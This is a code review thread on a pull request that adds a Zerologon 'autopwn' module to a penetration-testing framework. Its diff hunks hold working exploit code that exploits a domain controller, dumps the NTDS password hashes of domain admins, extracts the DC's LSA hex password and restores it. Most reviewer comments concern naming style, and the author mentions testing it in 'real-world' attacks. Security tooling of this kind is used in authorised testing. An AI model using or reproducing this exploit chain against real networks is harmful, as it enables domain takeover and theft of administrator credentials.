### PR TITLE
[Need more test] [module] Add zerologon autopwn

### PR DESCRIPTION
**Pull request by XiaoliChan**
Zerologon autopwn with auto restore DC password

image

### CODE REVIEW

File: cme/modules/zerologon.py [hunk 1]
```diff
@@ -43,63 +62,290 @@ def on_login(self, context, connection):
...
+                else:
+                    self.logger.fail(str(e))
+                return
+            else:
+                hexpass = secretsdump.LSADump(username=username, nthash=nthash)
+
+                action = ChangeMachinePassword(password=unhexlify(hexpass.strip("\r\n")), connection=connection, logger=self.logger)
+                action.restore_DCPass()
+
+class ZerologonEXP():
```
Comment (Marshall-Hallenbeck) [inline cme/modules/zerologon.py:87]: Class naming should be camelcase, so in this instance it should be "ZeroLogonExp"

File: cme/modules/zerologon.py [hunk 2]
```diff
@@ -43,63 +62,290 @@ def on_login(self, context, connection):
...
+            username = None
+
+            zerologon_exp.perform_attack(pwn_flag=True)
+
+            secretsdump = secretsdump_nano(self.logger, connection)
+            try:
+                username, nthash = secretsdump.NTDSDump_BlankPass()
+            except Exception as e:
+                if not username:
+                    self.logger.fail('All domain admins account has smb login issues, add "--debug" to get more details.')
```
Comment (Marshall-Hallenbeck) [inline cme/modules/zerologon.py:77]: We try to use double quotes on the outside and single on the inside

File: cme/modules/zerologon.py [hunk 3]
```diff
@@ -43,63 +62,290 @@ def on_login(self, context, connection):
...
+        self.logger = logger
+
+        domainParts = self.__domain.split('.')
+        baseDN = ''
+        for i in domainParts:
+            baseDN += 'dc=%s,' % i
+        # Remove last ','
+        self.__baseDN = baseDN[:-1]
+
+    def NTDSDump_BlankPass(self):
```
Comment (Marshall-Hallenbeck) [inline cme/modules/zerologon.py:203]: Functions should be lowercase, so "ntdsdump_blankpass"

File: cme/modules/zerologon.py [hunk 4]
```diff
@@ -43,63 +62,290 @@ def on_login(self, context, connection):
...
+            creds.append(ntds_hash.split(" ")[0])
+            self.logger.highlight(ntds_hash.split(" ")[0])
+        
+        # Initialize LDAP Connection
+        if self.__kdcHost is None:
+            self.__kdcHost = self.__remoteHost
+
+        ldapConnection = ldap.LDAPConnection(f"ldap://{self.__domain}", self.__baseDN, self.__kdcHost)
+        ldapConnection.login(self.__dcName, '', self.__domain, '', '')
+        searchFilter = f"(&(|(memberof=CN=Domain Admins,CN=Users,{self.__baseDN})(memberof=CN=Enterprise Admins,CN=Users,{self.__baseDN}))(!(userAccountControl:1.2.840.113556.1.4.803:=2)))"
```
Comment (Marshall-Hallenbeck) [inline cme/modules/zerologon.py:216]: Variables should be lowercase with underscores, so "search_filter"

File: cme/modules/zerologon.py [hunk 5]
```diff
@@ -43,63 +62,290 @@ def on_login(self, context, connection):
...
+
+        # Initialize smb connection for get into DRSUAPI method
+        smbConnection = SMBConnection(self.__remoteName, self.__remoteHost)
```
Comment (Marshall-Hallenbeck) [inline cme/modules/zerologon.py:219]: smb_connection

File: cme/modules/zerologon.py [hunk 6]
```diff
@@ -43,63 +62,290 @@ def on_login(self, context, connection):
...
         )
+        
+        self.logger.success(f'Dumping all domain admins creds to file {self.__outputFileName}.ntds')
+        nh.dump()
+        # Domain admin to extra lsa secret to get DC history password (plain_password_hex)
+        # Return all domain admins cred, for some reason, maybe some user creds are unavailable like PASSWORD_EXPIRED.
+        nh.finish()
+        return self.verifyCred(creds)
+    
+    def verifyCred(self, creds):
```
Comment (Marshall-Hallenbeck) [inline cme/modules/zerologon.py:251]: Should be "verify_creds"

File: cme/modules/zerologon.py [hunk 7]
```diff
@@ -43,63 +62,290 @@ def on_login(self, context, connection):
...
+                return username, nthash
+    
+    def LSADump(self, username, nthash):
+        def add_lsa_secret(secret):
+            if "plain_password_hex" in secret:
+                self.__hexpass = secret.split(":")[2]
+                self.logger.success(f"Dumping DC hex password")
+                self.logger.highlight(self.__hexpass)
+        
+        smbConnection = SMBConnection(self.__remoteName, self.__remoteHost)
```
Comment (Marshall-Hallenbeck) [inline cme/modules/zerologon.py:275]: Should be "smb_connection"

File: cme/modules/zerologon.py [hunk 8]
```diff
@@ -43,63 +62,290 @@ def on_login(self, context, connection):
...
+        smbConnection.login(username, '', self.__domain, '', nthash)
+        remoteOps  = RemoteOperations(smbConnection, False)
```
Comment (Marshall-Hallenbeck) [inline cme/modules/zerologon.py:277]: Variable naming

File: cme/modules/zerologon.py [hunk 9]
```diff
@@ -43,63 +62,290 @@ def on_login(self, context, connection):
...
+        
+        #remoteOps.setExecMethod("smbexec")
+        remoteOps.enableRegistry()
+        bootKey = remoteOps.getBootKey()
```
Comment (Marshall-Hallenbeck) [inline cme/modules/zerologon.py:281]: Variable naming

**Review by Marshall-Hallenbeck — CHANGES_REQUESTED** [review]
All instances of single quotes on the outside should be changed to double quotes for consistency. I tagged a bunch of places where the variable naming should be fixed to be Pythonic.

Which Windows versions did you test this against so far?

**Comment by XiaoliChan** [comment]
> Which Windows versions did you test this against so far?

most of server 2012 to server 2008 which I doing attack in real-world

**Comment by Marshall-Hallenbeck** [comment]
> most of server 2012 to server 2008 which I doing attack in real-world

Any newer versions, or non-server?

**Comment by XiaoliChan** [comment]
> Any newer versions, or non-server?

Not yet, but zerologon only attack DC, which means windows server edition.

**Comment by XiaoliChan** [comment]
@Marshall-Hallenbeck I would like to convert this to draft, this is dangerous exploit, let me test it with doing more real attack

**Comment by Marshall-Hallenbeck** [comment]
> @Marshall-Hallenbeck I would like to convert this to draft, this is dangerous exploit, let me test it with doing more real attack

Sounds good

**Comment by bongobongoland** [comment]
@XiaoliChan I have a bad feeling this is not going to work if you run it from Windows. Because of impacket. 
As far as I know, secretsdump doesn't function properly under Win.

**Comment by bongobongoland** [comment]
Ok, it does work :) I was wrong. 
Looking forward to autopwning using this mod.

File: cme/modules/zerologon.py (hunk 1 above)
Comment (XiaoliChan) [reply cme/modules/zerologon.py]: Fixed!

File: cme/modules/zerologon.py (hunk 2 above)
Comment (XiaoliChan) [reply cme/modules/zerologon.py]: Fixed!

File: cme/modules/zerologon.py (hunk 3 above)
Comment (XiaoliChan) [reply cme/modules/zerologon.py]: Fixed!

File: cme/modules/zerologon.py (hunk 4 above)
Comment (XiaoliChan) [reply cme/modules/zerologon.py]: Fixed!

File: cme/modules/zerologon.py (hunk 5 above)
Comment (XiaoliChan) [reply cme/modules/zerologon.py]: Fixed!

File: cme/modules/zerologon.py (hunk 6 above)
Comment (XiaoliChan) [reply cme/modules/zerologon.py]: Fixed!

File: cme/modules/zerologon.py (hunk 7 above)
Comment (XiaoliChan) [reply cme/modules/zerologon.py]: Fixed!

File: cme/modules/zerologon.py (hunk 8 above)
Comment (XiaoliChan) [reply cme/modules/zerologon.py]: Fixed!

**Pull request closed without merging**